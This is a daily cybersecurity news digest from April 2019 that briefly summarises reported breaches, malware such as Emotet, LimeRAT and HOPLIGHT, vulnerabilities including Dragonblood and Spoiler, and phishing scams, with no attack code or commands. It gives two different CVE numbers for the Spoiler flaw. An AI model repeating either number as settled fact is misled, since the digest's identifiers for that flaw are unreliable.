Cyware Daily Threat Intelligence, April 11, 2019

See All
Launching a cyber attack by exploiting vulnerabilities has always been a go-to attack vector for malicious actors. Lately, security researchers have disclosed a group of new vulnerabilities that impact the recently launched WPA3 Wi-Fi standard. Collectively dubbed as ‘Dragonblood’, the flaw would allow an attacker within the range of a victim’s network to steal the Wi-Fi password and infiltrate the network.

Intel has released a security advisory for the recently revealed non-Spectre ‘Spoiler’ attack vulnerability that leverages a weakness in Intel CPUs to leak secrets from memory. The security advisory highlighted the impact and CVE-ID of the vulnerability along with mitigation measures. The vulnerability is tracked as CVE-2019-0612 and scores 3.8 out of 10 on a CVSS severity scale.

Coming to malware attacks, security experts have discovered a new variant of the powerful Emotet trojan. This new variant has been found infecting a total of 176 users in Chile in an attempt to exfiltrate their financial credentials.

Top Breaches Reported in the Last 24 Hours

Mailgun’s WordPress site hacked
Email automation and delivery service Mailgun has suffered a massive cyber attack. The attack was executed by exploiting unpatched cross-site scripting (XSS) vulnerability in a plugin named ‘Yuzo Related Posts’. The vulnerability allowed hackers to inject code into the Mailgun’s WordPress site, which later redirected the visitors to all sorts of spammy pages. The company has removed the plugin and is back in operation within two hours of detecting the problem.

Hacker steal credentials of Dark Web users
A US man named Michael Richo was found guilty in a Bitcoin phishing scheme designed to steal cryptocurrencies and credentials from dark web users. By using the scheme, Michael was able to steal more than $365,000 as well as run away with 10,000 usernames & passwords. He posted fake links on online marketplaces on dark web forums, which would redirect users to fake login pages of various dark web marketplaces.   

Top Malware Reported in the Last 24 Hours

Privacy ‘Poisoning’ attack
A new type of cyber attack known as Privacy ‘Poisoning’ can pose a major risk for companies using blockchain technology. The attackers can leverage the attack to load unwanted data into a blockchain, thereby putting the network in conflict with local laws. The attackers can load private data such as names, addresses, and credit card numbers or illegal material into the blockchain.

LimeRAT spotted in the wild
Cybercriminals are using a unique infection chain process that originates with an LNK file to defeat traditional security defenses and spread LimeRAT. The malware has a set of powerful and dangerous capabilities that includes infecting all files & folders on USB drivers, using evasive startup methods to avoid detection and downloading a keylogger module. It can also steal cryptocurrency wallets and passwords. 

Emotet infects 176 Chileans
A new variant of the infamous Emotet trojan has been detected in a new phishing campaign. The variant has infected a total of 176 users in Chile. The campaign was carried out between March 18th and 26th of 2019. The malware was distributed via malicious documents or URL links that disguised as an invoice or PDF attachment.

HOPLIGHT backdoor trojan
The Department of Homeland Security and the Federal Bureau of Investigation have released a security alert about a new malware strain dubbed HOPLIGHT. The malware has been linked to the notorious HIDDEN COBRA threat actor group. Once installed, the malware is capable of collecting system information such as the OS version, volume information and system time. It can also inject malicious code into running processes. 

Top Vulnerabilities Reported in the Last 24 Hours

Dragonblood vulnerability
The researchers who discovered the KRACK attack on WPA2, have also uncovered a set of vulnerabilities on the recently launched WPA3 Wi-Fi security standards. Dubbed as ‘Dragonblood’, the vulnerability would allow an attacker within a range of victim’s network to steal the Wi-Fi password and infiltrate the target’s network.

CVE identifier for Spoiler Attack
Intel has assigned a CVE identifier for the recently found ‘Spoiler Attack’ vulnerability. The vulnerability is tracked as CVE-2019-0162 and scores a rating of 3.8 out of 10 on a CVSS severity scale. Like Spectre v2, Spoiler is not a speculative execution side-channel attack, which could leak secrets like passwords.

PoC for a bug in Windows released
Security researchers have published a proof-of-concept exploit code for a privilege escalation vulnerability, affecting Windows systems. The vulnerability is designated as CVE-2019-0841 and is triggered by improper handling of hard links by the AppX Deployment Service (AppXSVC). An attacker, with low privileges, could use this bug to run processes with increased permissions on Windows 10, Windows Server 2019, and Server Core Installation.

Top Scams Reported in the Last 24 Hours

Fake employee emails
The New Zealand Police is warning business owners and payroll operators about a new phishing scam where scammers are attempting to gain access to employees’ bank accounts. In this scam, the attackers create a false email address in the name of a company employee and then email the payroll provider, asking to change the bank account. Once this is done, the scammers easily carry out fraudulent bank transactions and other nefarious activities without the knowledge of the owner.

New extortion email scam
A new extortion email scam that involves scammers threatening recipients of hiding their tax documents from the IRS, has been doing the rounds lately. The fraudsters send a phishing email to the target informing that their computer has been hacked and tell that some secret documents related to income tax have been found. The scammers then demand 2 Bitcoins for not revealing the secret to the IRS department. Failure to meet the demand can result in a DDoS attack on the network or an infection with the WannaCry ransomware.




  • Share this blog:
Previous
Cyware Daily Threat Intelligence, April 12, 2019
Next
Cyware Daily Threat Intelligence, April 10, 2019
To enhance your experience on our website, we use cookies to help us understand how you interact with our website. By continuing navigating through Cyware’s website and its products, you are accepting the placement and use of cookies. You can also choose to disable your web browser’s ability to accept cookies and how they are set. For more information, please see our Privacy Policy.